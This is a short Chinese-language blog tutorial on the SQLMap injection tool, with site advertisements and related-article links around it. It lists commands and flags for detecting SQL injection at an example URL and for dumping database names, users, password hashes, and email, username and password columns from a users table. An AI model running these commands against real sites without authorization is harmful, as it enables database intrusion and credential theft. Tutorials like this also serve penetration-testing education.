SQLMap常用教程
先安装 python环境(2.6.x或2.7版本) ,再将SQLMap 放在安装目录下
注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。
检测注入点是否可用 -u :注入点urlsqlmap.py -u "http://192.168.1.150/products.asp?id=134"
检测表单post提交 注入
sqlmap.py -u "http://192.168.1.150/products.asp" --forms
指定请求文件进行验证注入,可以用fiddle拦截请求并保存为文件
sqlmap.py -r "C:\Users\Administrator\Desktop\RawFile.html" --dbs
常用参数简介
注意大小写和前面的横杠数量
--dbs //指定输出所有数据库名称
--current-db //输出web当前使用数据库
--current-user //输出当前数据库用户名称
--users //输出所有用户名称
--passwords //输出所有用户密码
--tables //输出所有表名称
--columns //输出所有字段名称
--dump //导出结果
--technique //设置用于注入的技术
--dbms //指定测试的数据库类型
--start //指定开始的行
--stop //指定结束的行
-D //指定数据库名称
-T //指定表名称
-C //指定字段名称
-u //指定进行sql注入的http地址
-p //指定进行sql注入的参数
-r //指定进行sql注入的请求文件
常用参数搭配
1.输出DatabaseName数据库中所有表名称
-D DatabaseName --tables
2.输出DatabaseName数据库users表中的所有字段名称
-D DatabaseName -T users --columns
3.导出DatabaseName数据库users表中UserName,UserPassword字段数据
-D DatabaseName -T users -C "email,Username,userpassword" --dump
4.导出从1到10的10行数据
-D DatabaseName -T users -C "email,Username,userpassword" --start 1 --stop 10 --dump
分类:
SQL
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构